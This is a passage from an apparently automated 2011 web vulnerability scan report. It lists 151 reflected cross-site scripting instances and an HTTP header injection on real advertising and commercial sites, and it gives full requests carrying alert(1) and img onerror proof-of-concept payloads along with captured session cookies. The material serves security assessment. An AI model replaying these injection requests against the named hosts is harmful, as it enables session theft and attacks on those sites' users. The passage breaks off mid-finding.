Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f343
9db56c3167b/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=340;dc=w;btg=bz.25;ord=1311108273:
Date: Tue, 19 Jul 2011 20:46:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://matcher.bidder7.mookie1.com/google [cver parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://matcher.bidder7.mookie1.com
Path:	/google

Issue detail

The value of the cver request parameter is copied into the X-ZAMA-MATCHER-ERROR response header. The payload e9da1%0d%0a3ed374399eb was submitted in the cver parameter. This caused a response containing an injected HTTP header.

Request

GET /google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=e9da1%0d%0a3ed374399eb&can=ffffffffffffffff HTTP/1.1
Host: matcher.bidder7.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1; RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE|U10Vu1|U10WDN; id=2814750682866683; session=1311100565|1311100565

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-ZAMA-MATCHER-ERROR: google has sent non numeric (or zero) cver 'e9da1
3ed374399eb'
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4. Cross-site scripting (reflected) previous next
There are 151 instances of this issue:

http://a.collective-media.net/adj/cm.quadbostonglobe/ [REST URL parameter 2]
http://a.collective-media.net/adj/cm.quadbostonglobe/ [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.quadbostonglobe/ [sz parameter]
http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 2]
http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 3]
http://a.collective-media.net/adj/q1.q.boston/be_bus [sz parameter]
http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 2]
http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 3]
http://a.collective-media.net/adj/q1.q.boston/be_home [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.q.boston/be_home [sz parameter]
http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 2]
http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 3]
http://a.collective-media.net/adj/q1.q.boston/bus [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.q.boston/bus [sz parameter]
http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.q.boston/be_bus [sz parameter]
http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.q.boston/be_home [sz parameter]
http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.q.boston/bus [sz parameter]
http://a.netmng.com/hic/ [passback&click parameter]
http://a.netmng.com/hic/ [passback&click parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]
http://api.bing.com/qsonhs.aspx [q parameter]
http://api.choicestream.com/instr/api/8e360375d27a5381/a1 [callback parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 2]
http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 3]
http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 4]
http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 2]
http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 3]
http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 4]
http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 2]
http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 3]
http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 4]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [&_RM_HTML_artist1_name_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 2]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 3]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 4]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_artistid_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bstate_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bzip_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_confcode_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_country_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_date_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_day_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_name_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_zone_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_eventid_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_fvalue_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_majorcatid_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_minorcatid_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pdate_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pday_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_ptime_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_tixp_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venue_name_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venueid_ parameter]
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venuezip_ parameter]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 2]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 3]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 4]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 2]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 3]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 4]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 2]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 3]
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 4]
http://bing.fansnap.com/checkout/index/415814268 [REST URL parameter 3]
http://bing.fansnap.com/checkout/index/415814268 [afm parameter]
http://bing.fansnap.com/checkout/index/415814268 [ch parameter]
http://bing.fansnap.com/checkout/index/415814268 [ctx parameter]
http://bing.fansnap.com/checkout/index/415814268 [poctx parameter]
http://bing.fansnap.com/checkout/index/415814268 [quantity parameter]
http://bing.fansnap.com/checkout/index/415814268 [uet parameter]
http://bing.fansnap.com/checkout/index/418563179 [REST URL parameter 3]
http://bing.fansnap.com/checkout/index/418563179 [afm parameter]
http://bing.fansnap.com/checkout/index/418563179 [ch parameter]
http://bing.fansnap.com/checkout/index/418563179 [ctx parameter]
http://bing.fansnap.com/checkout/index/418563179 [poctx parameter]
http://bing.fansnap.com/checkout/index/418563179 [quantity parameter]
http://bing.fansnap.com/checkout/index/418563179 [uet parameter]
http://cdnt.meteorsolutions.com/api/track [jsonp parameter]
http://corporate.everydayhealth.com/ [name of an arbitrarily supplied request parameter]
http://corporate.everydayhealth.com/about-eh-sites.aspx [name of an arbitrarily supplied request parameter]
http://digg.com/ajax/tooltip/submit [REST URL parameter 1]
http://digg.com/ajax/tooltip/submit [REST URL parameter 2]
http://digg.com/submit [REST URL parameter 1]
http://ib.adnxs.com/ptj [redir parameter]
http://image.providesupport.com/cmd/versionone [REST URL parameter 1]
http://js.revsci.net/gateway/gw.js [csid parameter]
https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]
https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]
https://manager.linode.com/session/forgot_save/N [REST URL parameter 3]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
http://r.turn.com/server/pixel.htm [fpid parameter]
http://r.turn.com/server/pixel.htm [sp parameter]
http://rd.rlcdn.com/rd [var parameter]
http://realnetworks.com/workarea/csslib/ektronCss.ashx [id parameter]
http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]
http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]
http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard [mbox parameter]
http://rover.ebay.com/idmap/0 [footer&cb parameter]
http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]
http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard [mbox parameter]
http://support.fastteks.com/contact-us.php [name of an arbitrarily supplied request parameter]
http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]
http://umfcluj.ro/contact.aspx [name of an arbitrarily supplied request parameter]
http://waypointlivingspaces.com/locate-dealer [zip parameter]
http://waypointlivingspaces.com/locate-dealer [zip parameter]
http://www.aaa.com/ [rurl parameter]
http://www.aaa.com/ [rurl parameter]
http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]
http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]
http://www.gamestop.com/ [name of an arbitrarily supplied request parameter]
http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 1]
http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 2]
http://www.gamestop.com/Recommendations.axd [REST URL parameter 1]
http://www.gamestop.com/ScriptResource.axd [REST URL parameter 1]
http://www.gamestop.com/WebResource.axd [REST URL parameter 1]
http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 1]
http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 2]
http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 3]
http://www.netlogiq.ro/Portofoliu-Web-Design.html [name of an arbitrarily supplied request parameter]
http://www.stumbleupon.com/submit [url parameter]
http://a.collective-media.net/cmadj/q1.q.boston/be_bus [cli cookie]
http://a.collective-media.net/cmadj/q1.q.boston/be_home [cli cookie]
http://a.collective-media.net/cmadj/q1.q.boston/bus [cli cookie]
http://seg.sharethis.com/getSegment.php [__stid cookie]
http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216 [meld_sess cookie]
http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228 [meld_sess cookie]
http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228 [meld_sess cookie]
http://www.clickmanage.com/events/clickevent.aspx [u parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a.collective-media.net/adj/cm.quadbostonglobe/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadbostonglobe/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 424e5'-alert(1)-'0d82f8283ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonglobe424e5'-alert(1)-'0d82f8283ff/;sz=160x600;ord=1311108273? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.2. http://a.collective-media.net/adj/cm.quadbostonglobe/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadbostonglobe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 944bf'-alert(1)-'38ad345cf2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.quadbostonglobe/;sz=160x600;ord=1311108273?&944bf'-alert(1)-'38ad345cf2b=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.3. http://a.collective-media.net/adj/cm.quadbostonglobe/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadbostonglobe/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 681b5'-alert(1)-'892d1bce44a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.quadbostonglobe/;sz=160x600;ord=1311108273?681b5'-alert(1)-'892d1bce44a HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.4. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 668d1'-alert(1)-'767c5f8121b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston668d1'-alert(1)-'767c5f8121b/be_bus;sz=160x600;ord=1807584008? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.5. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f995'-alert(1)-'d38328d152e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/be_bus7f995'-alert(1)-'d38328d152e;sz=160x600;ord=1807584008? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.6. http://a.collective-media.net/adj/q1.q.boston/be_bus [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff159'-alert(1)-'0f3a998551e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/be_bus;sz=160x600;ord=1807584008?ff159'-alert(1)-'0f3a998551e HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.7. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7520a'-alert(1)-'51a5e5793c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston7520a'-alert(1)-'51a5e5793c6/be_home;sz=728x90;ord=84105094? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

4.8. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5e2d'-alert(1)-'6cb15244eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/be_homef5e2d'-alert(1)-'6cb15244eb;sz=728x90;ord=84105094? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

4.9. http://a.collective-media.net/adj/q1.q.boston/be_home [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39bd4'-alert(1)-'4b3749168e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/be_home;sz=728x90;ord=84105094?&39bd4'-alert(1)-'4b3749168e0=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

4.10. http://a.collective-media.net/adj/q1.q.boston/be_home [sz parameter] previous next

Summary

Severity:	High
